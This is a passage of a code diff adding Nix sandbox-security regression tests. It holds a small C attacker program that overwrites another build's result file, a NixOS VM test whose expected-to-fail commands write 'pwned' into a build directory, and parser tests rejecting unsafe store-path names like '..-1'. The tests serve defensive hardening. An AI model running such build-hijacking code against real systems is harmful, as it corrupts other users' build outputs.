+          sleep(1);
+          int builddir = openat(dirfd, ev->name, O_DIRECTORY);
+          if (builddir < 0) {
+            perror("opening the build directory");
+            continue;
+          }
+          int resultfile = openat(builddir, "build/result", O_WRONLY | O_TRUNC);
+          if (resultfile < 0) {
+            perror("opening the hijacked file");
+            continue;
+          }
+          int writeres = write(resultfile, "bad\n", 4);
+          if (writeres < 0) {
+            perror("writing to the hijacked file");
+            continue;
+          }
+          fprintf(stderr, "Hijacked the build for %s\n", ev->name);
+          return 0;
+        }
+      }
+    }
+
+    exit(0);
+  }
+}
+

tests/nixos/user-sandboxing/default.nix

@@ -0,0 +1,129 @@
+{ config, ... }:
+
+let
+  pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+  attacker = pkgs.runCommandWith {
+    name = "attacker";
+    stdenv = pkgs.pkgsStatic.stdenv;
+  } ''
+    $CC -static -o $out ${./attacker.c}
+  '';
+
+  try-open-build-dir = pkgs.writeScript "try-open-build-dir" ''
+    export PATH=${pkgs.coreutils}/bin:$PATH
+
+    set -x
+
+    chmod 700 .
+    # Shouldn't be able to open the root build directory
+    (! chmod 700 ..)
+
+    touch foo
+
+    # Synchronisation point: create a world-writable fifo and wait for someone
+    # to write into it
+    mkfifo syncPoint
+    chmod 777 syncPoint
+    cat syncPoint
+
+    touch $out
+
+    set +x
+  '';
+
+  create-hello-world = pkgs.writeScript "create-hello-world" ''
+    export PATH=${pkgs.coreutils}/bin:$PATH
+
+    set -x
+
+    echo "hello, world" > result
+
+    # Synchronisation point: create a world-writable fifo and wait for someone
+    # to write into it
+    mkfifo syncPoint
+    chmod 777 syncPoint
+    cat syncPoint
+
+    cp result $out
+
+    set +x
+  '';
+
+in
+{
+  name = "sandbox-setuid-leak";
+
+  nodes.machine =
+    { config, lib, pkgs, ... }:
+    { virtualisation.writableStore = true;
+      nix.settings.substituters = lib.mkForce [ ];
+      nix.nrBuildUsers = 1;
+      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell attacker try-open-build-dir create-hello-world pkgs.socat ];
+      boot.kernelPackages = pkgs.linuxPackages_latest;
+      users.users.alice = {
+        isNormalUser = true;
+      };
+    };
+
+  testScript = { nodes }: ''
+    start_all()
+
+    with subtest("A builder can't give access to its build directory"):
+        # Make sure that a builder can't change the permissions on its build
+        # directory to the point of opening it up to external users
+
+        # A derivation whose builder tries to make its build directory as open
+        # as possible and wait for someone to hijack it
+        machine.succeed(r"""
+          nix-build -v -E '
+            builtins.derivation {
+              name = "open-build-dir";
+              system = builtins.currentSystem;
+              builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+              args = [ (builtins.storePath "${try-open-build-dir}") ];
+          }' >&2 &
+        """.strip())
+
+        # Wait for the build to be ready
+        # This is OK because it runs as root, so we can access everything
+        machine.wait_for_file("/tmp/nix-build-open-build-dir.drv-0/build/syncPoint")
+
+        # But Alice shouldn't be able to access the build directory
+        machine.fail("su alice -c 'ls /tmp/nix-build-open-build-dir.drv-0/build'")
+        machine.fail("su alice -c 'touch /tmp/nix-build-open-build-dir.drv-0/build/bar'")
+        machine.fail("su alice -c 'cat /tmp/nix-build-open-build-dir.drv-0/build/foo'")
+
+        # Tell the user to finish the build
+        machine.succeed("echo foo > /tmp/nix-build-open-build-dir.drv-0/build/syncPoint")
+
+    with subtest("Being able to execute stuff as the build user doesn't give access to the build dir"):
+        machine.succeed(r"""
+          nix-build -E '
+            builtins.derivation {
+              name = "innocent";
+              system = builtins.currentSystem;
+              builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+              args = [ (builtins.storePath "${create-hello-world}") ];
+          }' >&2 &
+        """.strip())
+        machine.wait_for_file("/tmp/nix-build-innocent.drv-0/build/syncPoint")
+
+        # The build ran as `nixbld1` (which is the only build user on the
+        # machine), but a process running as `nixbld1` outside the sandbox
+        # shouldn't be able to touch the build directory regardless
+        machine.fail("su nixbld1 --shell ${pkgs.busybox-sandbox-shell}/bin/sh -c 'ls /tmp/nix-build-innocent.drv-0/build'")
+        machine.fail("su nixbld1 --shell ${pkgs.busybox-sandbox-shell}/bin/sh -c 'echo pwned > /tmp/nix-build-innocent.drv-0/build/result'")
+
+        # Finish the build
+        machine.succeed("echo foo > /tmp/nix-build-innocent.drv-0/build/syncPoint")
+
+        # Check that the build was not affected
+        machine.succeed(r"""
+          cat ./result
+          test "$(cat ./result)" = "hello, world"
+        """.strip())
+  '';
+
+}
+

tests/unit/libstore-support/tests/path.cc

@@ -1,3 +1,4 @@
+#include <rapidcheck/gen/Arbitrary.h>
 #include <regex>
 
 #include <rapidcheck.h>
@@ -20,63 +21,60 @@ void showValue(const StorePath & p, std::ostream & os)
 namespace rc {
 using namespace nix;
 
-Gen<StorePathName> Arbitrary<StorePathName>::arbitrary()
+Gen<char> storePathChar()
 {
-    auto len = *gen::inRange<size_t>(
-        1,
-        StorePath::MaxPathLen - StorePath::HashLen);
-
-    std::string pre;
-    pre.reserve(len);
-
-    for (size_t c = 0; c < len; ++c) {
-        switch (auto i = *gen::inRange<uint8_t>(0, 10 + 2 * 26 + 6)) {
+    return rc::gen::apply([](uint8_t i) -> char {
+        switch (i) {
             case 0 ... 9:
-                pre += '0' + i;
+                return '0' + i;
             case 10 ... 35:
-                pre += 'A' + (i - 10);
-                break;
+                return 'A' + (i - 10);
             case 36 ... 61:
-                pre += 'a' + (i - 36);
-                break;
+                return 'a' + (i - 36);
             case 62:
-                pre += '+';
-                break;
+                return '+';
             case 63:
-                pre += '-';
-                break;
+                return '-';
             case 64:
-                // names aren't permitted to start with a period,
-                // so just fall through to the next case here
-                if (c != 0) {
-                    pre += '.';
-                    break;
-                }
+                return '.';
             case 65:
-                pre += '_';
-                break;
+                return '_';
             case 66:
-                pre += '?';
-                break;
+                return '?';
             case 67:
-                pre += '=';
-                break;
+                return '=';
             default:
                 assert(false);
         }
-    }
+    },
+    gen::inRange<uint8_t>(0, 10 + 2 * 26 + 6));
+}
 
-    return gen::just(StorePathName {
-        .name = std::move(pre),
-    });
+Gen<StorePathName> Arbitrary<StorePathName>::arbitrary()
+{
+    return gen::construct<StorePathName>(
+        gen::suchThat(
+            gen::container<std::string>(storePathChar()),
+            [](const std::string & s) {
+                return
+                    !( s == ""
+                    || s == "."
+                    || s == ".."
+                    || s.starts_with(".-")
+                    || s.starts_with("..-")
+                    );
+            }
+        )
+    );
 }
 
 Gen<StorePath> Arbitrary<StorePath>::arbitrary()
 {
-    return gen::just(StorePath {
-        *gen::arbitrary<Hash>(),
-        (*gen::arbitrary<StorePathName>()).name,
-    });
+    return
+        gen::construct<StorePath>(
+            gen::arbitrary<Hash>(),
+            gen::apply([](StorePathName n){ return n.name; }, gen::arbitrary<StorePathName>())
+        );
 }
 
 } // namespace rc

tests/unit/libstore/path.cc

@@ -39,7 +39,12 @@ TEST_DONT_PARSE(double_star, "**")
 TEST_DONT_PARSE(star_first, "*,foo")
 TEST_DONT_PARSE(star_second, "foo,*")
 TEST_DONT_PARSE(bang, "foo!o")
-TEST_DONT_PARSE(dotfile, ".gitignore")
+TEST_DONT_PARSE(dot, ".")
+TEST_DONT_PARSE(dot_dot, "..")
+TEST_DONT_PARSE(dot_dot_dash, "..-1")
+TEST_DONT_PARSE(dot_dash, ".-1")
+TEST_DONT_PARSE(dot_dot_dash_a, "..-a")
+TEST_DONT_PARSE(dot_dash_a, ".-a")
 
 #undef TEST_DONT_PARSE
 
@@ -63,6 +68,11 @@ TEST_DO_PARSE(underscore, "foo_bar")
 TEST_DO_PARSE(period, "foo.txt")
 TEST_DO_PARSE(question_mark, "foo?why")
 TEST_DO_PARSE(equals_sign, "foo=foo")
+TEST_DO_PARSE(dotfile, ".gitignore")
+TEST_DO_PARSE(triple_dot_a, "...a")
+TEST_DO_PARSE(triple_dot_1, "...1")
+TEST_DO_PARSE(triple_dot_dash, "...-")
+TEST_DO_PARSE(triple_dot, "...")
 
 #undef TEST_DO_PARSE
 
@@ -84,6 +94,64 @@ RC_GTEST_FIXTURE_PROP(
     RC_ASSERT(p == store->parseStorePath(store->printStorePath(p)));
 }
 
+
+RC_GTEST_FIXTURE_PROP(
+    StorePathTest,
+    prop_check_regex_eq_parse,
+    ())
+{
+    static auto nameFuzzer =
+        rc::gen::container<std::string>(
+            rc::gen::oneOf(
+                // alphanum, repeated to weigh heavier
+                rc::gen::oneOf(
+                    rc::gen::inRange('0', '9'),
+                    rc::gen::inRange('a', 'z'),
+                    rc::gen::inRange('A', 'Z')
+                ),
+                // valid symbols
+                rc::gen::oneOf(
+                    rc::gen::just('+'),
+                    rc::gen::just('-'),
+                    rc::gen::just('.'),
+                    rc::gen::just('_'),
+                    rc::gen::just('?'),
+                    rc::gen::just('=')
+                ),
+                // symbols for scary .- and ..- cases, repeated for weight
+                rc::gen::just('.'), rc::gen::just('.'),
+                rc::gen::just('.'), rc::gen::just('.'),
+                rc::gen::just('-'), rc::gen::just('-'),
+                // ascii symbol ranges
+                rc::gen::oneOf(
+                    rc::gen::inRange(' ', '/'),
+                    rc::gen::inRange(':', '@'),
+                    rc::gen::inRange('[', '`'),
+                    rc::gen::inRange('{', '~')
+                ),
+                // typical whitespace
+                rc::gen::oneOf(
+                    rc::gen::just(' '),
+                    rc::gen::just('\t'),
+                    rc::gen::just('\n'),
+                    rc::gen::just('\r')
+                ),
+                // some chance of control codes, non-ascii or other garbage we missed
+                rc::gen::inRange('\0', '\xff')
+        ));
+
+    auto name = *nameFuzzer;
+
+    std::string path = store->storeDir + "/575s52sh487i0ylmbs9pvi606ljdszr0-" + name;
+    bool parsed = false;
+    try {
+        store->parseStorePath(path);
+        parsed = true;
+    } catch (const BadStorePath &) {
+    }
+    RC_ASSERT(parsed == std::regex_match(std::string { name }, nameRegex));
+}
+
 #endif
 
 }

tests/unit/libutil-support/tests/hash.cc

@@ -11,10 +11,17 @@ using namespace nix;
 
 Gen<Hash> Arbitrary<Hash>::arbitrary()
 {
-    Hash hash(HashAlgorithm::SHA1);
-    for (size_t i = 0; i < hash.hashSize; ++i)
-        hash.hash[i] = *gen::arbitrary<uint8_t>();
-    return gen::just(hash);
+    Hash prototype(HashAlgorithm::SHA1);
+    return
+        gen::apply(
+            [](const std::vector<uint8_t> & v) {
+                Hash hash(HashAlgorithm::SHA1);
+                assert(v.size() == hash.hashSize);
+                std::copy(v.begin(), v.end(), hash.hash);
+                return hash;
+            },
+            gen::container<std::vector<uint8_t>>(prototype.hashSize, gen::arbitrary<uint8_t>())
+        );
 }
 
 }